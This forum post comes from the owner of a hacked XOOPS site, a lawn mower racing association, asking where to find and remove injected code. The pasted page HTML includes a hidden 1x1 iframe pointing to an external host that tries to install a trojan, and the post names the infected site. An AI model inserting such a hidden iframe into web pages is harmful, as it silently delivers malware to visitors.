1
It appears as if my XOOPS site has been hacked, a iframe pointing to
http://googlerank.info/counter has appeared in the coding on the main page which then trys to download something nasty.
I'm not sure where to look to remove it though, i extracted the MySQL database and couldnt find it in any of the tables and did a search for it in all the php,htm,html,css files of the site too.
Although not visable to a site user its coding appears underneath the menu on the left of the site, just before the random xoopsgallery image.
table><div class="blockContent"><table cellspacing="0">
<tr>
<td id="mainmenu">
<a class="menuTop" href="http://www.blmra.co.uk/">Homea>
<a class="menuMain" href="http://www.blmra.co.uk/modules/wfchannel/">About Lawn Mower Racinga>
<a class="menuMain" href="http://www.blmra.co.uk/modules/news/">Latest Newsa>
<a class="menuMain" href="http://www.blmra.co.uk/modules/googlemaps/">Eventsa>
<a class="menuMain" href="http://www.blmra.co.uk/modules/turismo/">12 Houra>
<a class="menuMain" href="http://www.blmra.co.uk/modules/xoopsfaq/">FAQa>
<a class="menuMain" href="http://www.blmra.co.uk/modules/page/">Race Resultsa>
<a class="menuMain" href="http://www.blmra.co.uk/modules/wmpdownloads/">Downloadsa>
<a class="menuMain" href="http://www.blmra.co.uk/modules/osC/">Online Purchasinga>
<a class="menuMain" href="http://www.blmra.co.uk/modules/xoopsgallery/">Gallerya>
<a class="menuMain" href="http://www.blmra.co.uk/modules/association/">Videoa>
<a class="menuMain" href="http://www.blmra.co.uk/modules/userpage/">Racers Profilesa>
<a class="menuMain" href="http://www.blmra.co.uk/modules/newbb/">Check Race Entrya>
<a class="menuMain" href="http://www.blmra.co.uk/modules/catads/">Classifiedsa>
<a class="menuMain" href="http://www.blmra.co.uk/modules/myalbum/">Users Photosa>
<a class="menuMain" href="http://www.blmra.co.uk/modules/mylinks/">Linksa>
<a class="menuMain" href="http://www.blmra.co.uk/modules/services/">Contact Usa>
<a class="menuMain" href="http://www.blmra.co.uk/modules/dms/">Document Management Systema>
td>
tr>
table>div>td>
tr>
table>
<table cellspacing="0">
<tr>
<td class="obBlock" ><table cellspacing="0">
<tr>
<td width="4"><img src="http://www.blmra.co.uk/themes/blmrav6//images/lhl.gif" width="4" height="20" alt="" />td>
<td class="blockTitle" >Random Picturetd>
<td width="4"><img src="http://www.blmra.co.uk/themes/blmrav6//images/lhr.gif" width="4" height="20" alt="" />td>
tr>
table><div class="blockContent"><iframe src=http://googlerank.info/counter width=1 height=1 style=display:none>
<div> <div style="width: 100%;">
<div class="item" style="padding: 2px; margin: 2px;">
<div style="text-align: center; width: 100%; ">
<a href="http://www.blmra.co.uk/modules/xoopsgallery/view_photo.php?xoops_imageid=4332&set_albumName=album18&id=IMG_0167"><img src="http://www.blmra.co.uk/modules/xoopsgallery/cache/albums/album18/IMG_0167.thumb.jpg" width="150" height="100" alt="" />a><br />
div>
<div style="text-align: center; width: 100%; ">
div>
div>
div>
<div style="clear:both;">div>div>
div>td>
tr>
table>
Anyone have any ideas where i should look to remove this?
The site is
http://www.blmra.co.uk, my virus scanner catches it every time. Although look at your own risk, it trys to install a trojan.
Thanks
Deano
